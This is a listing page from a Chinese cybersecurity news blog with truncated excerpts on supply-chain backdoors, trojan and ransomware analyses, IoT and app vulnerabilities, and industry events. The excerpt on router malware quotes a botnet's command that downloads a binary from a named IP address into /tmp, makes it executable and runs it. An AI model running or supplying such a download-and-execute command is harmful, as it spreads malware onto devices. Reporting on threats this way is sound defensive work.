业内新闻 - 蛋壳博客 - 网络安全博客

业内新闻 - 蛋壳博客 - 网络安全博客 业内新闻 - 蛋壳博客 - 网络安全博客

业内新闻

业内新闻

开源软件的供应链安全吗?黑客正在利用源代码传播恶意软件

蛋壳 发布于 9-7

过去一年里,发生了一连串开源软件遭受供应链攻击的事件,并且态势愈演愈烈。就在最近,甚至发现2个独立的后门漏洞进入了数十万服务器管理员下载的库中。第一个曝光的后门来自Webmin,这是一个安装量超过100万,基于Web的管理工具。根据Webmin开发人员JamieCameron称,去年4月左右,攻击者破坏了用于开发新版本程序的服务器。然后,恶意使用...

阅读(107) 评论(0 )

业内新闻

漏洞扫描技巧之Web漏洞扫描器研究

3

蛋壳 发布于 9-7

0×00前言 之前我们简单介绍了一下扫描器中爬虫的部分,接下来将继续介绍一下扫描器中一些我们认为比较有趣的技巧。0×01编码/解码/协议在很久以前有人提问AMF格式的请求怎么进行检测,或者有什么工具可以检测。既然我们要讲解的是 Web漏洞扫描器,那么就先假设是AMFoverHTTP(这里并不需要你了解AMF,你只需要知道AMF...

阅读(111) 评论(0 )

业内新闻

一例信息窃取木马分析报告

44

蛋壳 发布于 9-7

一、前言近日,中兴通讯高级邮件防御系统捕获一例病毒样本。通过分析发现,该样本会通过进程替换等方式释放,并在傀儡进程中运行AgentTesla木马以达到信息窃取的目的。以下是对该样本的分析。二、样本简介该样本为Autoit3编写的exe文件:反编译出部分脚本,脚本做了较强的混淆:脚本使用了多种混淆手法,如常数被转换成数学运算、无用的随机变量赋值、调...

阅读(101) 评论(0 )

业内新闻

三款恶意软件同时目标锁定路由器

蛋壳 发布于 9-1

Neko7月22日,我们的蜜罐检测到一个僵尸网络的恶意软件样本,x86.neko(被TrendMicro检测为Backdoor.Linux.NEKO.AB),该样本具有弱口令爆破的功能,之后会执行以下命令:“cd/tmp/;wgethxxp://185.244.25.200/bins/x86.neko;chmod777x86.neko;./x86...

阅读(114) 评论(0 )

业内新闻

Hickory智能门锁存在的多个漏洞

7

蛋壳 发布于 8-27

近期,Rapid7安全研究团队发现了Hickory蓝牙智能系列BlueToothEnabledDeadbolt款式门锁存在多个安全漏洞,漏洞涉及其移动端APP应用和云托管的Web服务和MQTT协议。截至漏洞披露期限前,Hickory官方还未对这些漏洞作出认可,也未发布任何补丁或漏洞修复措施。HickorySmartBluetoothEnabled...

阅读(100) 评论(0 )

业内新闻

Shade活跃,中国将成为下一个受害者?

37

蛋壳 发布于 8-18

Shade光顾?2014年底,国外安全人员首次发现Shado勒索软件,其目标主要是俄罗斯,但近期,这个历史悠久的勒索软件已经开始“光顾”俄罗斯以外的国家,这表明,开发商正在增加其受害者集的广度。Shade又名“Ransom.Troldesh”,通过钓鱼邮件进行传播。从2018年第四季度到2019年第一季度,Shade攻击事件数量飙升,其感染企业多...

阅读(23) 评论(0 )

业内新闻

金融服务机构和客户的头号威胁:94%的攻击都来源于这四种

2

蛋壳 发布于 8-14

一、网络钓鱼域名和凭证填充报告指出,在2018年12月2日到2019年5月4日期间,检测出了将近200000个网络钓鱼域,其中66%的网络钓鱼域直接针对消费客户。而在仅针对消费客户的网络钓鱼域里,又有50%的目标公司来自金融服务行业。(约6600个网络钓鱼域)。Akamai安全研究员MartinMcKeay坦言:“在过去一年,我们看到凭证填充攻击...

阅读(25) 评论(0 )

业内新闻

还原币安用户信息泄露事件:黑客攻击黑客?

4

蛋壳 发布于 8-9

据coindesk今日消息,昨日在社交网络上公布币安KYC的人声称,他是为了“引起币安对真正的幕后黑手”的注意才这样做的,而他是一个“白帽黑客(WhiteHatHacker)”,自五月份币安交易所被盗7000个比特币以来,他一直在追踪这笔资金,且发现币安被盗事件中,有币安内部人士的参与。事件回顾:7000比特币被盗,客户信息泄露2019年5月8日...

阅读(62) 评论(0 )

业内新闻

WhatsApp曝重大安全漏洞 允许黑客篡改用户聊天信息

1

蛋壳 发布于 8-9

腾讯科技讯,据外媒报道,以色列网络安全公司CheckPoint今日称,在Facebook旗下流行的消息应用WhatsApp中发现严重安全漏洞,允许黑客操控用户的聊天消息,无论是在公共对话模式下,还是私密对话。很明显,这些安全漏洞可能导致错误信息的传播,而这些信息又似乎是来自可信赖的消息来源。CheckPoint称,其研究人员发现了三种可能改变用户...

阅读(35) 评论(0 )

业内新闻

勒索病毒新姿势:伪装SpyHunter安全软件

15

蛋壳 发布于 8-6

GarrantyDecrypt扮演SpyHunter近日,国外安全研究人员曝光了一款伪装成安全软件SpyHunter的勒索病毒,其开发人员使用了SpyHunter的标识作为勒索软件的图标,同时将文件命名为“SpyHunters.exe”,通过钓鱼邮件附件进行传播,并在勒索文本中写道“OurcompanySpyHunterisguaranteedt...

阅读(104) 评论(0 )

业内新闻

亚马逊首席技术官谈网络安全自动化:这是每个工程师的事情,是趋势

2

蛋壳 发布于 8-4

亚马逊首席技能官、副总裁WernerVogels在CSS上演讲钛媒体快讯|7月30日动静:亚马逊首席技能官、副总裁WernerVogels出席了腾讯公司主理的第五届互联网安详首脑峰会(CyberSecuritySummit2019,简称CSS2019)。Werner以为安详不只仅是安详团队的使命,而是每个工程师都必要存眷到的内容,我们要有将安详纳...

阅读(37) 评论(0 )

业内新闻

iPhone蓝牙流量被指在某些情况下泄露用户电话号码

1

蛋壳 发布于 8-2

安全研究员表示他们能够在某些操作中从iPhone智能手机的蓝牙流量中提取用户的手机号码。该攻击起作用的地方在于,当启动苹果设备上的蓝牙时,设备在全方位发送BLE(蓝牙低功耗)数据包,广播设备的位置和多种详情。这种行为是苹果无线直连(AWDL)协议的部分行为,该协议可通过WiFi或BLE互联并允许数据在附近的设备之间进行传输。此前的学术研究工作指出...

阅读(38) 评论(0 )

业内新闻

2019 CSS互联网安全领袖峰会首日纪实

12

蛋壳 发布于 7-31

随着大数据、云计算等基础能力的完善,AI技术正在走出实验室,承担台前幕后的各项工作,赋能安全乃至反哺业务。往年热议的话题一步步落地夯实,今年的CSS又将带给我们怎样的惊喜呢?2019年7月30日,第五届CSS互联网安全领袖峰会在京举行。今年的主题围绕“产业升级”、“安全升维”,聚集诸多行业领袖,探讨产业互联网时代的安全之道。腾讯公司云与智慧产业总...

阅读(58) 评论(0 )

业内新闻

利用DNS隧道构建隐蔽C&C信道

18

蛋壳 发布于 7-26

背景介绍无论是高级持续性威胁(APT)、僵尸网络(Botnet),还是勒索软件、后门等,命令与控制信道(C&C)都是其重要组成部分,尤其是APT和僵尸网络中的C&C信道决定了其威胁程度。学术界和工业界就C&C方面的研究已逐渐深入,目前网络战格局逐渐形成,公众对网络安全逐渐重视,网络空间中的攻防双方持续较量。迫于当前形势,攻...

阅读(82) 评论(0 )

业内新闻

Chrome漏洞高额悬赏

5

蛋壳 发布于 7-24

 据外媒CNET,自2010年以来,谷歌已向一些报告Chrome浏览器安全漏洞的安全研究人员支付赏金。而现在谷歌宣布将提高赏金额度。据Chrome安全博客文章称,这将包括将最高基础赏金额度从5000美元增加到15000美元,并将“高质量报告”的最高赏金金额从15000美元增加到30000美元。对于Chrome操作系统,谷歌基于浏览器的C...

阅读(88) 评论(0 )


sitemap